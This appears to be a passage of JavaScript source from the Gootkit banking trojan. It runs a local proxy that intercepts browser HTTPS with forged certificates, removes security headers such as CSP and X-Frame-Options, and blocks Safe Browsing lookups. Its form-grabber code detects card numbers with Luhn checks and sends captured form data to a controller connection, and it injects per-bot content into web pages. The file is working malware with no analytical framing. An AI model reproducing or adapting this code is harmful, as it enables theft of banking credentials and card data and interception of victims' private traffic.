    for (var i = 0; i < HeadersNameParts.length; i++) {
        var t = HeadersNameParts[i];
        switch (t) {
            case 'www':
                HeadersNameParts[i] = 'WWW';
                break;
            default:
                HeadersNameParts[i] = CapitaliseFirstLetter(HeadersNameParts[i]);
                break;
        }

    }
    return HeadersNameParts.join('-');
}

function patchRequestHeaders(headers, newRequest) {

    var newHeaders = {};
    var restrictedHeaders = [
        "if-modified-since",
        "if-none-match",
        "accept-encoding"
    ];

    for (var h in headers) {
        if (restrictedHeaders.indexOf(h) === -1) {
            newHeaders[CapitalizeHeaderNameString(h)] = headers[h];
        }
    }

    newHeaders["Host"] = newRequest.host;
    newHeaders["Connection"] = 'keep-alive';

    return newHeaders;
}

function PatchDescByRedirectionRules(clientRequest){
    
    
    
    

    if (util.isUndefined(clientRequest)) {
        return false;
    }

    if (util.isUndefined(clientRequest.desc)) {
        return false;
    }

    var murl = clientRequest.desc.location;
    var method = clientRequest.desc.method.toUpperCase();

    if(method !== 'GET'){
        return false;
    }

    if (util.isUndefined(process.g_scfg)) {
        return false;
    }

    var redirectsArray = process.g_scfg.redirects;

    if (util.isUndefined(redirectsArray)) {
        return false;
    }
    
    for(var i = 0; i < redirectsArray.length; i ++)
    {

        

        if(redirectsArray[i].keyword.length < 2){
            continue;
        }

        if(redirectsArray[i].uri.length < 2){
            continue;
        }


        var keywordIndex = murl.indexOf(redirectsArray[i].keyword);
        if(keywordIndex !== -1)
        {
            var urlpart = murl.substr(keywordIndex + redirectsArray[i].keyword.length);
            if(urlpart && urlpart.length > 1)
            {
                var newUrl = (redirectsArray[i].uri + urlpart);
                var parsedUrl = url.parse(newUrl);

                clientRequest.headers.host = parsedUrl.host;
                clientRequest.url = parsedUrl.path;
                clientRequest.isSSL = (parsedUrl.protocol == 'https:');

                if(parsedUrl.port){
                    clientRequest.remotePort = parseInt(parsedUrl.port);
                }else{
                    if(clientRequest.isSSL){
                        clientRequest.remotePort = 443;
                    }else{
                        clientRequest.remotePort = 80;
                    }
                }
                
                return true;
            }
        }
    }


    return false;
}

function createRequestOption(clientRequest) {

    var newRequest = patchRequestLocation(
        clientRequest.headers.host,
        clientRequest.url,
        clientRequest.isSSL);

    var newHeaders = patchRequestHeaders(
        clientRequest.headers,
        newRequest);

    var x = {
        agent: false,
        hostname: clientRequest.headers.host,
        port: PORT_REDIRECTION_BASE + clientRequest.remotePort,
        path: newRequest.path,
        method: clientRequest.method,
        headers: newHeaders,
        rejectUnauthorized: false
    };

    if (typeof (clientRequest.headers['connection']) === 'string') {
        if (clientRequest.headers['connection'].toLowerCase() === 'keep-alive') {
            
            
        }
    }

   
   
   

    return x;
}

function isSslRequest(req) {
    return (req.isSSL == true);
}

function createUrlDescriptionFromRequestObject(req) {
    var headersString = '';


    for (var h in req.headers) {
        headersString += util.format('%s: %s\r\n', h, req.headers[h]);
    }

    var obj = {
        method: req.method,
        source: util.format("%s [%s.%s]", process.currentBinary, process.version, process.g_botId),
        location: req.url,
        referer: req.headers.referer,
        isSsl: isSslRequest(req),
        rawHeaders: headersString
    };

    var protocolSlashesPosition = obj.location.indexOf('://');
    if (protocolSlashesPosition !== 4 && protocolSlashesPosition !== 5) {
        obj.location = util.format(
            "%s//%s%s",
            (isSslRequest(req) ? 'https:' : 'http:'),
            req.headers.host,
            req.url
        );
    }

    if(obj.location.indexOf('please_baby_stop_fuck_my_ass') !== -1){
        exports.SpStopHttpIntercepting();
    }

    return obj;
}




function calculateAlphabetSize(password) {
    var ustr = '';
    for (var i = 0; i < password.length; i++) {
        if (ustr.indexOf(password.charAt(i)) == -1) {
            ustr += password.charAt(i);
        }
    }
    return ustr;
}

function GetCCType(cc_num){
    var type = 0;
    
    if (cc_num.charAt(0) == '4' && (cc_num.length == 16 || cc_num.length == 13))
        type = 1;
        
    else if (cc_num.charAt(0) == '5' && cc_num.length== 16)
        type = 2; 
        
    else if (cc_num.charAt(0) == '3' && (cc_num.charAt(1) == '4' || cc_num.charAt(1) == '7') && cc_num.length == 15)
        type = 3; 
        
    else if (cc_num.charAt(0) == '6' && cc_num.charAt(1) == '0' && cc_num.charAt(2) == '1' && cc_num.charAt(3) == '1' && cc_num.length == 16)
        type = 4; 
    return type;

}

function luhnChk(luhnstr) {
    try{
        var luhn = luhnstr.replace(/[^0-9]/g, '');
        var len = luhn.length,
            mul = 0,
            prodArr = [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 2, 4, 6, 8, 1, 3, 5, 7, 9]],
            sum = 0;

        if (len != 16 || ((luhnstr.length - len) >= 6)) {
            return false;
        }

        if(GetCCType(luhnstr) == 0){
            return false;
        }

        if (calculateAlphabetSize(luhnstr).length < 5) {
            return false;
        }

        while (len--) {
            sum += prodArr[mul][parseInt(luhn.charAt(len), 10)];
            mul ^= 1;
        }
        return sum % 10 === 0 && sum > 0;
    }catch(exception)
    {
        return false;
    }
}

function checkParsedRequestStringForLuhn10(parsedBody) {
    if (!util.isUndefined(parsedBody)) {
        for (var pair in parsedBody) {
            if (luhnChk(parsedBody[pair].toString()) === true) {
                return true;
            }
        }
    }
    return false;
}

function IsBadUrl(url) {
    var restrictedUrls = [
        'facebook.com/ajax/',
        'mail.google.com/mail/',
        'mail.live.com/mail/'
    ];

    for (var i = 0; i < restrictedUrls.length; i++) {
        if (url.indexOf(restrictedUrls[i]) !== -1) {
            return true;
        }
    }

    return false;
}


var restrictedHosts = [
    'www.google-analytics.com',
    'counter.rambler.ru',
    'rs.mail.ru',
    'suggest.yandex.ru',
    'clck.yandex.ru',
    'plus.google.com',
    'plus.googleapis.com',
    's.youtube.com',
    'urs.microsoft.com',
    'safebrowsing-cache.google.com',
    'safebrowsing.google.com',
    'www.youtube.com'
];

var restrictedExtensions = [
    '.png', '.jpg', '.jpeg', '.gif', '.bmp',
    '.pcx', '.tiff', '.js', '.css', '.swf',
    '.avi', '.mpg', '.aac', '.mp3', '.mov',
    '.jar', '.cnt', '.scn', '.ico'
];

var restrictedSubstrings = [
    'safebrowsing',
    '.metric.gstatic.com',
    '/complete/search'
]

process.formgrabber = {
    restrictedExtensions: restrictedExtensions,
    restrictedHosts: restrictedHosts,
    restrictedSubstrings: restrictedSubstrings,
    options: {
        http: {
            grubGet: false,
            grubPost: false
        },

        https: {
            grubGet: false,
            grubPost: false
        }
    }
}

exports.formgrabber = process.formgrabber;

function IsBadFormgrabberForm(form) {

    

    try{
        if(form.postData)
        {
            if(form.postData.length > 2048)
            {
                
                return true;
            }
        }

        var urlObject = url.parse(form.location);
        var pathname = urlObject.pathname;

        for (let i = 0; i < restrictedSubstrings.length; i++) {
            if (form.location.toLowerCase().indexOf(restrictedSubstrings[i]) !== -1) {
                return true;
            }
        }

        if (
            (restrictedExtensions.indexOf(path.extname(pathname.toLowerCase())) === -1) &&
            (restrictedHosts.indexOf(urlObject.host.toLowerCase()) === -1) &&
            (!IsBadUrl(form.location.toLowerCase()))
        ) {
            if (process.formgrabber.options) {
                var rule = process.formgrabber.options[form.protocol];
                if (!util.isUndefined(rule)) {
                    if (form.method === 'GET' && rule.grubGet === true)
                        return false; 

                    if (form.method === 'POST' && rule.grubPost === true)
                        return false; 
                }
            }
        }
    }catch(exception){
        process.log(exception, JSON.stringify(form));
    }
    return true;
}

function grabRequestData(form) {

    form.protocol = form.isSsl ? 'https' : 'http';

    if(!process.masterConnection){
        trace('grabRequestData() no master connection');
        return;
    }

    if(process.bIsDebugVersion){
        trace(form);
    }

    process.masterConnection.sendProtocolPacket(
        SLAVE_PACKET_URLNOTIFICATION,
        new Buffer(form.location)
    );

    if (!IsBadFormgrabberForm(form)) {

        var postData = form.postData;


        if (postData) {
            form.isLuhnTestPassed =
                checkParsedRequestStringForLuhn10(
                    querystring.parse(postData.toString()));
        }
        else 
        {
            form.isLuhnTestPassed = false;
        }

        if (process.masterConnection) {
            process.masterConnection.sendProtocolPacket(
                SLAVE_PACKET_FORM,
                messages.Form.encode(form)
            );
        }
        else{
            
        }
    }
    else{
        
    }
}






var injAlowedContentTypes = [
    'text'
];


var injRestrictedSubstrings = [
    'safebrowsing',
    '.metric.gstatic.com',
    '/complete/search'
];

exports.injects = {
    injRestrictedSubstrings : injRestrictedSubstrings,
    restrictedExtensions: restrictedExtensions,
    injAlowedContentTypes: injAlowedContentTypes
}


function getEncodingBySource(buffer)
{
    try{
        var x = buffer.toString();
        var matches = x.match(/<meta.*?charset=([^"']+)/);
    	
        if(matches === null)
            return 'utf-8';
    
        return matches[1];
    }catch(error){

        return 'utf-8';
    }
}

function isUrlNeedMatchedInRule(murl, inject) {

    var bisUrlNeedMatchedInRule = false;

    if (!util.isUndefined(inject.base.guids)) {
        if (inject.base.guids.length > 0) {
            if (inject.base.guids.indexOf(process.machineGuid.toLowerCase()) === -1) {
                return false;
            }
        }
    }

    if(zeusfunctions.zeusIsModificationNeeded(murl, inject.base.url)){

        bisUrlNeedMatchedInRule = true;

        inject.stoplist.forEach(function(condition){
            try 
            {
                if(murl.match(new RegExp(condition, "ig"))){
                    bisUrlNeedMatchedInRule = false;
                }
            }catch(exception){

            }
        })
    }

    return bisUrlNeedMatchedInRule;
}


function isMethodAlowed(method, inject) {
    if (
        (method == 'POST' && inject.base.filt_post) ||
        (method == 'GET' && inject.base.filt_get)
    ) {
        return true;
    }

    return false;
}

function ReplaceStandartMacroses(str) {
    var retval = str;

    if (typeof (process.machineGuid) === 'string') {
        retval = retval.replace(/BOT_MACHINE_UUID/g, process.machineGuid);
    }

    retval = retval.replace(/BOT_MACHINE_DATE/g, new Date().toJSON());
    retval = retval.replace(/BOT_MACHINE_TIMESTAMP/g, Math.round(+new Date() / 1000));
    retval = retval.replace(/BOT_USERNAME/g, process.currentUser);
    retval = retval.replace(/BOT_USERDOMAIN/g, process.env['USERDOMAIN']);
    retval = retval.replace(/BOT_COMPUTERNAME/g, process.env['COMPUTERNAME']);
    retval = retval.replace(/BOT_VERSION/g, process.g_botId);
    retval = retval.replace(/BOT_PROCESS/g, process.currentBinary);
    retval = retval.replace(/BOT_PROCESS_ID/g, process.pid);
    retval = retval.replace(/BOT_PROCESS_PATH/g, process.execPath);

    var storedObjects = process.FsReadObjectEncrypted('gatevars.txt');
    if(storedObjects)
    {
        for(var i in storedObjects)
        {
            retval = retval.split(i).join(storedObjects[i]);
        }
    }

    return retval;
}

function executeInjection(arg, on_complete) {

    var bDataIsModifed = false;

    if (util.isUndefined(process.g_scfg)) {
        return on_complete(arg, bDataIsModifed);
    }

    var injectsArray = process.g_scfg.injects;

    if (util.isUndefined(injectsArray)) {
        return on_complete(arg, bDataIsModifed);
    }

    if (util.isUndefined(arg)) {
        return on_complete(arg, bDataIsModifed);
    }

    var bContentTypeIsCorrect = true;
    var contentEncoding = getEncodingBySource(arg.htmlBuffer);
    
    if(process.bIsDebugVersion){
        trace('getEncodingBySource() : %s' , contentEncoding);
    }

    if (!util.isUndefined(arg.contentType)) {
        if (arg.contentType.indexOf('charset=') !== -1) {
            contentEncoding = arg.contentType.split('charset=')[1].toLowerCase();
            if(process.bIsDebugVersion){
                trace('header contentEncoding : %s', contentEncoding);
            }
        }
    }
    
    
    var method = arg.method;
    var murl = arg.location;

    var urlObject = url.parse(murl);
    var pathname = urlObject.pathname;
    var extname = path.extname(pathname.toLowerCase());
        
    for(let i = 0; i < injRestrictedSubstrings.length; i ++){
        if(murl.indexOf(injRestrictedSubstrings[i]) !== -1){
            return on_complete(arg, bDataIsModifed);
        }
    }

    if(!util.isUndefined(process.IsBadPageForInject) && process.IsBadPageForInject(arg)){
        //print('IsBadPageForInject');
        return on_complete(arg, bDataIsModifed);
    }

    var htmlText = iconv.decode(arg.htmlBuffer, contentEncoding);

    //trace('htmlBuffer : %d bytes', arg.htmlBuffer.length);
    //trace('source : %d bytes', htmlText.length);


    for (let i = 0; i < injectsArray.length; i++) {
        var inj = injectsArray[i];

        if (inj.base.enabled === false) {
            continue;
        }

        if (!isUrlNeedMatchedInRule(murl, inj)) {
            continue;
        }

        if (!isMethodAlowed(method, inj)) {
            continue;
        }

        //print('zeusExecuteInjection!');
        var tmp = zeusfunctions.zeusExecuteInjection(htmlText, inj);
        if (tmp) {
            htmlText = ReplaceStandartMacroses(tmp);
            bDataIsModifed = true;
        }
    }

    if (bDataIsModifed) {
        arg.htmlBuffer = iconv.encode(new Buffer(htmlText), contentEncoding);
    }

    on_complete(arg, bDataIsModifed);
}


function isContentModificationNeeded(arg) {

    var murl = arg.location;
    var method = arg.method.toUpperCase();

    if (util.isUndefined(process.g_scfg)) {
        return false;
    }

    var injectsArray = process.g_scfg.injects;

    if (util.isUndefined(injectsArray)) {
        return false;
    }

    if (util.isUndefined(arg)) {
        return false;
    }


    try {

        for (let i = 0; i < injectsArray.length; i++) {

            var inj = injectsArray[i];

            if (inj.base.enabled === false) {
                //trace('%s : disabled', inj.base.url);
                continue;
            }

            if (!isUrlNeedMatchedInRule(murl, inj)) {
                //trace('%s : not matched', inj.base.url);
                continue;
            }

            if (!isMethodAlowed(method, inj)) {
                //trace('%s : method not alowed', inj.base.url);
                continue;
            }

            //trace('%s : is matched!', inj.base.url);

            return true;
        }

    } catch (e) {
       process.logException(e, JSON.stringify(arg));
       //trace('exception : isContentModificationNeeded() : %s', e.message);
    }

    return false;
}

//------------------------------------------------
// -- 
//------------------------------------------------

function RemoveTooGoodHeaders(headers)
{
    [
        "If-None-Match",
        "X-WebKit-CSP",
        "X-Content-Security-Policy",
        "Content-Security-Policy-Report-0nly",
        "Content-Security-Policy-Report-Only",
        "X-Content-Security-Policy-Report-Only",
        "X-Frame-Options",
        "Content-Security-Policy",
        "X-Content-Type-Options",
        "X-Frame-Options",
        "X-XSS-Protection",
        'accept-range',
        'alternate-protocol',
        'content-length'
    ].forEach(function(hdr){
        delete headers[hdr.toLowerCase()];
    })
}
function getBrowserResponseHeaders(realResponse) {

    var newHeaders = realResponse.headers;
    RemoveTooGoodHeaders(newHeaders);
    newHeaders['transfer-encoding'] = 'chunked';

   //trace('=================== NEW HEADERS ===================');
   //trace(JSON.stringify(newHeaders, undefined, 2));

    return newHeaders;
}


function modifyResponseBufferIfNecessary(clientRequest, realResponse, responseBuffer, onComplete) {

    clientRequest.desc.htmlBuffer = responseBuffer;
    clientRequest.desc.contentType = realResponse.headers['content-type'];
    clientRequest.desc.responseHeaders = getBrowserResponseHeaders(realResponse);
    clientRequest.desc.statusCode = realResponse.statusCode;

    executeInjection(clientRequest.desc, onComplete);
}

function PathResponseHeadersDisableCache(headers){
    headers['expires'] = 'Mon, 26 Jul 1997 05:00:00 GMT';
    headers['Cache-Control'] = 'no-store, no-cache, must-revalidate';
    headers['Pragma'] = 'no-cache';

    RemoveTooGoodHeaders(headers);
}

function sendHeaders(clientResponse, statusCode, headers) {
    var headersArray = [];
    /*
    res.writeHead(200, [
        ['Set-Cookie', 'mycookie1=value1'],
        ['Set-Cookie', 'mycookie2=value2']
    ]);*/

    for (var h in headers) {

        var headerName = h;
        var headerValue = headers[h];

        if (headerName === 'www-authenticate') {
            var headerVeluesArray = headerValue.split(', ');
            headerVeluesArray.forEach(function (item) {
                headersArray.push([
                    CapitalizeHeaderNameString(headerName), item
                ]);
            });
        } else {
            headersArray.push([
                 CapitalizeHeaderNameString(headerName), headerValue
            ]);
        }
    }

    //headersArray.push(['X-Modifed-By', 'Gootkit v8']);

    //trace(JSON.stringify(headersArray, undefined, 2));

    clientResponse.writeHead(statusCode, headersArray);
}

function isInternalApiRequest(requestDesc){
    if(requestDesc.location.indexOf('spinternalcall') !== -1){
        return true;
    }

    return false;
}

function IsLocationLocked(location){

    //trace("IsLocationLocked : '%s'", location);

    if(!process.proxyServers){
        return false;
    }

    if(!process.proxyServers.blockedAddresses){
        return false;
    }


    for(let i = 0; i < process.proxyServers.blockedAddresses.length; i ++){
        if (zeusfunctions.zeusSearchContentIndex(location, 
            process.proxyServers.blockedAddresses[i])
        ){
            return true;
        }
    }

    return false;
}

function manageUserConnection(clientRequest, clientResponse, isSsl) {

    clientRequest.isSSL = isSsl;

    //trace('begin clientRequest.headers : >>>>>>>>')
    //trace(clientRequest.headers);
    //trace('end of clientRequest.headers : <<<<<<<<')
    clientRequest.desc = createUrlDescriptionFromRequestObject(clientRequest);
    
    if(isInternalApiRequest(clientRequest.desc)){
        //trace("thi is internal request. serve data");
        return require('internalapi').serve(clientRequest, clientResponse);
    }

    var requestEngine = ((isSsl == true) ? https : http);

    if(IsLocationLocked(clientRequest.desc.location) === true){
        //trace("location locked. ending request...");
        return clientResponse.end();
    } 

    clientRequest.isRedirectionRuleTriggered = 
        PatchDescByRedirectionRules(clientRequest);

    var proxyRequest = requestEngine.request(createRequestOption(clientRequest), function (realResponse) {

        /*if (isSsl) {
            var ssl = proxyRequest.socket.ssl || proxyRequest.socket.pair.ssl;
            if (ssl) {
                clientRequest.desc.isCertificateUsed = ssl.isCertificateUsed();
                if (clientRequest.desc.isCertificateUsed === true) {
                    trace('WARN : cetrification detected, stoppeng proxy for %s (%d)', realResponse.connection.remoteAddress, ip2long(realResponse.connection.remoteAddress));
                    
                    gootkit_spyware.DisableProxySpecifyAddress(ip2long(realResponse.connection.remoteAddress));
                }
            }
        }*/

        //trace(clientRequest.desc);

        if(!clientRequest.isRedirectionRuleTriggered){
            grabRequestData(clientRequest.desc);
        }

        //trace("%s : %s(%d): http://%s%s", clientRequest.socket.remoteAddress, clientRequest.method, realResponse.statusCode, clientRequest.headers.host, clientRequest.url);
        //trace(' ============== realResponse.headers : =================');
        //trace(JSON.stringify(realResponse.headers, undefined, 2));        
        //trace(realResponse.headers);
        //trace('===============END OF realResponse.headers =============\n\n');

        //trace('isTextResponse=%s; isContentModificationNeeded=%s', 
        //    isTextResponse(realResponse.headers), 
        //    isContentModificationNeeded(clientRequest.desc)); 

        var bIsTextResponse = isTextResponse(realResponse.headers);

        if(bIsTextResponse){
            PathResponseHeadersDisableCache(realResponse.headers);
        }

        if (
            (!clientRequest.isRedirectionRuleTriggered) && 
            bIsTextResponse && 
            isContentModificationNeeded(clientRequest.desc)
        ){
            //trace('isTextResponse=1; begin buffering') 
            excludedHosts = [];
            clientResponse.isResponseMustBeBuffered = true;
            clientResponse.buffers = [];


            realResponse.headers['X-Server-Security-Policy'] = 'Enable All';

        } else {

            realResponse.headers['X-Server-Security-Policy'] = 'Disabled';

           //trace('isTextResponse=0; setting status code to %s', realResponse.statusCode);

            if (clientRequest.url.indexOf("safebrowsing") !== -1) {
                sendHeaders(clientResponse, 404, getBrowserResponseHeaders(realResponse));
                clientResponse.writeHead(404, getBrowserResponseHeaders(realResponse));
            } else {
                sendHeaders(clientResponse, realResponse.statusCode, getBrowserResponseHeaders(realResponse));
                clientResponse.writeHead(realResponse.statusCode, getBrowserResponseHeaders(realResponse));
            }
        }

        realResponse.on('data', function (chunk) {

           //trace('real_response data : %d bytes', chunk.length);

            if (clientResponse.isResponseMustBeBuffered == true) {
                clientResponse.buffers.push(chunk);
            } else {
                
                clientResponse.write(chunk, 'binary');
            }
        });

        realResponse.on('end', function () {
            try{
                if (clientResponse.isResponseMustBeBuffered == true) {

                    var bufferedResponse = Buffer.concat(clientResponse.buffers);

                    if(process.bIsDebugVersion){
                        trace('total %d bytes collected', bufferedResponse.length);
                    }

                    modifyResponseBufferIfNecessary(clientRequest, realResponse, bufferedResponse, function (newResponseObject, isModifed) {

                        if(process.bIsDebugVersion){
                            trace('got modifed (? %d) server response', isModifed);
                        }

                        if (isModifed && newResponseObject && newResponseObject.htmlBuffer) {

                            newResponseObject.responseHeaders['X-Server-Time'] =  new Date().getTime().toString();

                            sendHeaders(clientResponse, newResponseObject.statusCode, newResponseObject.responseHeaders);
                            //clientResponse.writeHead(newResponseObject.statusCode, newResponseObject.responseHeaders);
                            clientResponse.end(newResponseObject.htmlBuffer);

                        } else {

                            sendHeaders(clientResponse, realResponse.statusCode, getBrowserResponseHeaders(realResponse));
                            //clientResponse.writeHead(realResponse.statusCode, getBrowserResponseHeaders(realResponse));
                            clientResponse.end(bufferedResponse);
                        }
                    });
                } else {
                    clientResponse.end()
                }

            }catch(exception){

                console.log(exception.stack);
                console.log(exception.message);


                process.logException(exception, JSON.stringify({
                    statusCode : realResponse.statusCode,
                    desc : clientRequest.desc,
                    responseHeaders : realResponse.headers
                }));

                clientResponse.end();
            }
            
        });

        realResponse.on('error', function (rerr) {
            //trace('response error [%s], close connection', rerr.message);
            clientResponse.end();
        });
    });


    proxyRequest.on('end', function () {
        //  trace('proxy_request.end ');
        clientResponse.end()
    });

    proxyRequest.on('error', function (error) {
       //trace('=====================================');
       //trace("proxyRequest ERROR : %s", error);
       //trace(error);
       //trace(clientRequest.desc);
       //trace('=====================================\n\n');
        clientResponse.end()
    });

    if (isValidFormdataPostRequest(clientRequest)) {
        clientRequest.isPostRequest = true;
        clientRequest.dataLengthReaded = 0;
        clientRequest.post_buffers = [];
    }

    clientRequest.on('data', function (chunk) {

        if (clientRequest.isPostRequest) {
            if (clientRequest.dataLengthReaded < kMaximumPostDataLength) {
                clientRequest.post_buffers.push(chunk);
                clientRequest.dataLengthReaded += chunk.length;
            } else {
                if (clientRequest.post_buffers.length > 0) {
                    clientRequest.post_buffers = [];
                }
            }
        }

        proxyRequest.write(chunk, 'binary');

    });

    clientRequest.on('error', function (error) {
       //trace('=====================================');
       //trace("client_request ERROR : %s", error);
       //trace(error);
       //trace(clientRequest.desc);
       //trace('=====================================\n\n');
        clientResponse.end()
    });

    clientRequest.on('end', function () {
       //trace('client_request.end ');

        if (clientRequest.post_buffers && clientRequest.post_buffers.length > 0) {
            clientRequest.desc.postData = Buffer.concat(clientRequest.post_buffers);
        }
        proxyRequest.end();
        
    });
}
//=========================================================================================================
var runningSSLServers = {};
var runningPlainServers = {};


var certificateCache = {};
var excludedHosts = [];
var includedPorts = [
    80,
	443,

	110, // pop3
	995, // pop3-secured

	143, // imap
	993, // imap-secured
	//25,	 // smtp
	//2525,// smtp
	//465,  // smtp-secured
    8082,
    8083,

    666 // DOOM3,

];

process.proxyServers = {
    runningSSLServers : runningSSLServers,
    runningPlainServers : runningPlainServers,
    excludedHosts : excludedHosts,
    certificateCache : certificateCache,
    includedPorts : includedPorts,
    portRedirectionCallbacks : {},
    blockedAddresses : []
};

function GetCertificateForPeer(remoteHost, peerCertificate, cb) {

    if (!util.isUndefined(remoteHost)) {
        if (util.isUndefined(certificateCache[remoteHost])) {
            //if (process.currentBinary === 'firefox.exe')
            {

                /* subject:
                   { C: 'RU',
                     ST: 'Russia',
                     L: 'Moscow',
                     OU: 'ITO',
                     O: 'Yandex LLC',*/

                //[12148] JS : CN="mail.ru", RU, RUSSIAN FEDERATION, Moscow, IT, LLC Mail.ru, 

                //print("peerCertificate %j", peerCertificate)

                var dnsNames = [],
                    uriNames = [],
                    ips = [];

                if(!util.isUndefined(peerCertificate.subjectaltname))
                {
                    peerCertificate.subjectaltname.split(/, /g).forEach(function(altname) {
                        var option = altname.match(/^(DNS|IP Address|URI):(.*)$/);
                        if (!option)
                            return;
                        if (option[1] === 'DNS') {
                            dnsNames.push(option[2]);
                        } else if (option[1] === 'IP Address') {
                            ips.push(option[2]);
                        } else if (option[1] === 'URI') {
                            var uri = url.parse(option[2]);
                            if (uri) uriNames.push(uri.hostname);
                        }
                    });
                }
               

                //print(dnsNames);
                //print(uriNames);
                //print(ips);
                
                var attributes = [];

                [ 
                    'CN', 'C', 
                    'ST', 'L', 
                    'OU', 'O', 
                    'E'/*, 'SN',
                    'businessCategory',
                    '1.3.6.1.4.1.311.60.2.1.3'*/
                ].forEach(function(attr){
                    if(!util.isUndefined(peerCertificate.subject[attr]))
                    {
                        attributes.push(attr + '="' +peerCertificate.subject[attr] + '"');
                    }
                });

                //print(attributes.join(", "));
                /*
                fs.writeFileSync(
                        remoteHost + '.crt',
                        peerCertificate.raw
                );
                */
                //attributes.push('1.3.6.1.4.1.311.60.2.1.3=RU');
                //attributes.push('2.5.4.15="Private Organization"');
                //attributes.push('2.5.4.5=1027700067328');

                certgen.generateValidCertSignedByMagic(attributes.join(", "), dnsNames, uriNames, ips, function (error, options) {

                    /*fs.writeFileSync(
                         'fake_' + remoteHost + '.crt',
                         options.cert
                    );*/

                    certificateCache[remoteHost] = options;
                    cb(null, options);
                })
            }
            /*else
            {
                certgen.resignCertByMagic(peerCertificate.raw, function (error, options) {
                    certificateCache[remoteHost] = options;
                    cb(null, options);
                })
            }

            console.dir(peerCertificate);
             print('REMOVE DUMP!!!');
             fs.writeFileSync(
                 remoteHost + '.crt',
                 peerCertificate.raw
             );*/

            
        }
        else {
            cb(null, certificateCache[remoteHost]);
        }
    }

    if (
        peerCertificate &&
        peerCertificate.subject &&
        peerCertificate.subject.CN
    ) {


    }
    else {
        cb(new Error('invalid request'));
    }
}


function ReinitializeAutocloseTimeout(serverInstance) {
    if (!util.isUndefined(serverInstance.autoCloseTimerId)) {
        clearTimeout(serverInstance.autoCloseTimerId);
    }

    serverInstance.autoCloseTimerId = setTimeout(function () {
        //print('autoclose server %s', serverInstance.remoteHost);
        serverInstance.isClosed = true;
        serverInstance.close();
    }, 120000);
}
//=========================================================================================================
var bIsFuckedIeOnXP;
function IsFuckedIeOnXP(){
    var ntver = parseInt(os.release().split('.')[0]);
    return (ntver === 5 && process.currentBinary === 'iexplore.exe');
}

function ServeHttpsRequest(serverInstance, clientRequest, clientResponse) {
    if(!util.isUndefined(serverInstance)){
        clientRequest.remoteHost = serverInstance.remoteHost;
        ReinitializeAutocloseTimeout(serverInstance);
    }
    clientRequest.remotePort = 443;
    manageUserConnection(clientRequest, clientResponse, true);
}

function ServeHttpRequest(httpServer, clientRequest, clientResponse) {
    if(!util.isUndefined(httpServer)){
        clientRequest.remoteHost = httpServer.remoteHost;
        ReinitializeAutocloseTimeout(httpServer);
    }
    clientRequest.remotePort = 80;
    manageUserConnection(clientRequest, clientResponse, false);
}

function GeneratePeerFakeCetrificate(remoteHost, remotePort, onDone){

    var ondonecalled = false;

    function call_back(arg){
        if(!ondonecalled){
            ondonecalled = true;
            onDone(null, arg);
        }
    };

    var cleartextStream = tls.connect(
        PORT_REDIRECTION_BASE + remotePort,
        remoteHost,
    { 
        rejectUnauthorized: false , 
        secureProtocol : 'TLSv1_method'
    }, function () {
        var peerCertificate = cleartextStream.getPeerCertificate();
        GetCertificateForPeer(remoteHost, peerCertificate, function (error, cert) {
            if (cert){
                call_back(cert);
            }else{
                call_back(null);
            }
            cleartextStream.end();
        });
    });

    cleartextStream.on('error', function (error) {
        if (
            (error.message.indexOf('alert number 40') !== -1) ||
            (error.message.indexOf('alert number 42') !== -1)
        ){
            if(error.message.indexOf('alert number 40') !== -1){
                process.log("%s -> user certificate required: remoteHost=%s",
                    process.currentBinary,
                    remoteHost);
            }
            dns.resolve4(remoteHost, function(e, ips){
                if(ips){
                    excludedHosts = excludedHosts.concat(ips).unique();
                }
                call_back(null);                  
            });
        } else {
            call_back(null);
        }
    });
}
function ProcessSSLConnection(remoteHost, address, onDone)
{
    
    var ondonecalled = false;

    if(bIsFuckedIeOnXP === false)
    {
        if (!util.isUndefined(runningSSLServers["superserver"])) {

            if(runningSSLServers["superserver"].serverInstance.isClosed === false){
                //print('server already runnning for %s', remoteHost);
                address.remoteAddress = '127.0.0.1';
                address.remotePort = runningSSLServers["superserver"].serverInstancePort;
                ondonecalled = true;
                return onDone(address);
            }
        }

        function ServerSNICallback(servername, callback)
        {
            if(!servername) 
                servername = remoteHost;

            var isCbCalled = false;
            function cbcall(error, result){
                if(!isCbCalled){
                    isCbCalled = true;
                    callback(error, result);
                }
            }

           //trace("ServerSNICallback : resolving certificate for %s", servername);

            var cleartextStream = tls.connect(
                PORT_REDIRECTION_BASE + 443,
                servername, {   
                    rejectUnauthorized: false,
                    servername :  servername,
                    secureProtocol : 'TLSv1_method'
                },
            function () 
            {
               //trace('%s : TLS client connected;', servername);
                var peerCertificate = cleartextStream.getPeerCertificate();
                GetCertificateForPeer(servername, peerCertificate, function (error, cert) {

                   //trace("%s : done! call back", servername);
                   if (cert) 
                   {
                      // trace("key generated!");
                       // trace({
                      //      cert: cert.cert,
                      //      key: cert.key
                      //  });

                        cbcall(null, tls.createSecureContext({
                            cert: cert.cert,
                            key: cert.key
                        }));
                    }
                    else 
                   {
                       //trace('cetr generation failed');
                        excludedHosts.push(remoteHost);
                        cbcall(new Error('cetr generation failed'));
                    }
                    cleartextStream.end();
                });
            });

            cleartextStream.on('error', function (error) {
                //trace('cleartextStream (with SNI) error!')
                //trace(error);
                //trace(error.stack);
                //trace(error.message);

                if (
                    (error.message.indexOf('alert number 40') !== -1) ||    // user certificate requred
                    (error.message.indexOf('alert number 42') !== -1)       // invalid certificate
                )
                {
                    if(error.message.indexOf('alert number 40') !== -1){
                        process.log("%s -> user certificate required: remoteHost=%s, servername=%s",
                            process.currentBinary,
                            remoteHost,
                            servername);
                    }

                    dns.resolve4(servername, function(e, ips){
                        if(ips){
                           //trace('cert generation failed, block this host (%s)', ips);
                            excludedHosts = excludedHosts.concat(ips).unique();
                            //trace(excludedHosts);
                        }
                        cbcall(new Error('cert generation failed'));                        
                    })
                }
                else{
                    cbcall(new Error('cert generation failed'));  
                }
            });
        }
    
        utils.getPort({host : '127.0.0.1'}, function (err, randomPort) {
        
            var serverInstance = https.createServer(
            {
                cert: global_cert,
                key: global_key,
                SNICallback: ServerSNICallback
            }, function (req, res) {
                ServeHttpsRequest(undefined, req, res);
            });

            runningSSLServers["superserver"] =
            {
                serverInstance: serverInstance,
                serverInstancePort: randomPort,
                remoteHost: "superserver",
                certificate: undefined,
                isClosed : false
            }

            serverInstance.isClosed = false;
            serverInstance.listen(randomPort, '127.0.0.1');
            serverInstance.on('listening', function () {
                address.remotePort = randomPort;
                address.remoteAddress = '127.0.0.1';
